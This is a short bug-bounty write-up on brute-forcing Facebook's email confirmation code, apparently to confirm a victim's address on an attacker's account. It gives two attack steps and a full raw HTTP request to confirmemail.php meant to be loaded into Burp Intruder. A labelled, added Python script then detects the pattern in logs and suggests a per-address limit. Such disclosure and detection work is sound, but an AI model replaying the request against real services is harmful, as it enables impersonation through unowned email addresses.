Confirming any new Email Address bug in Facebook (Part-4)

https://m.facebook.com/confirmemail.php?e=victim@mail.com@&c=15579&report=1&message=1
  1. Create a new Facebook account with the victim’s email address.
  2. Open Burp Suite and paste the request below into Intruder.

GET /confirmemail.php?e=redacted@email.com&c=12345&report=1&message=1 HTTP/1.1
Host: m.facebook.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: c_user=0; xs=0;
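On the defending side, traffic of this shape can be spotted in access logs by counting how many different `c` values are submitted for the same `e` address. The following is an added example, not code from the original post or from Facebook; it assumes the request is repeated with varying `c` values, and the log format, sample lines and threshold are constructed for illustration.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (hypothetical format: ip "request line" status).
SAMPLE_LOG = [
    f'{"203.0.113.7" if code % 2 == 0 else "198.51.100.9"} '
    f'"GET /confirmemail.php?e=victim%40example.com&c={code}&report=1&message=1 HTTP/1.1" 200'
    for code in range(10000, 10006)
] + [
    '192.0.2.44 "GET /confirmemail.php?e=user%40example.com&c=48213&report=1&message=1 HTTP/1.1" 200',
    '192.0.2.44 "GET /home.php HTTP/1.1" 200',
    'malformed line without a request',
]

def parse_confirm_attempt(line):
    """Return (client_ip, email, code) for a confirmemail.php request, else None."""
    try:
        ip, rest = line.split(" ", 1)
        method, target, _version = rest.split('"')[1].split(" ")
    except (ValueError, IndexError):
        return None  # not in the expected log format
    url = urlsplit(target)
    if method != "GET" or url.path != "/confirmemail.php":
        return None
    query = parse_qs(url.query)
    if "e" not in query or "c" not in query:
        return None
    return ip, query["e"][0].lower(), query["c"][0]

def flag_code_guessing(lines, max_distinct_codes=3):
    """Flag email addresses that received more distinct codes than the threshold.

    Grouping is by target address rather than client IP, so attempts spread
    across several source addresses are still counted together.
    """
    codes, sources = defaultdict(set), defaultdict(set)
    for line in lines:
        hit = parse_confirm_attempt(line)
        if hit:
            ip, email, code = hit
            codes[email].add(code)
            sources[email].add(ip)
    return {
        email: {"distinct_codes": len(seen), "sources": sorted(sources[email])}
        for email, seen in codes.items()
        if len(seen) > max_distinct_codes
    }

if __name__ == "__main__":
    print(flag_code_guessing(SAMPLE_LOG))
```

The same per-address counter, enforced server-side with the code invalidated once the threshold is reached, is the corresponding mitigation.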

Web Security Researcher

Lokesh Kumar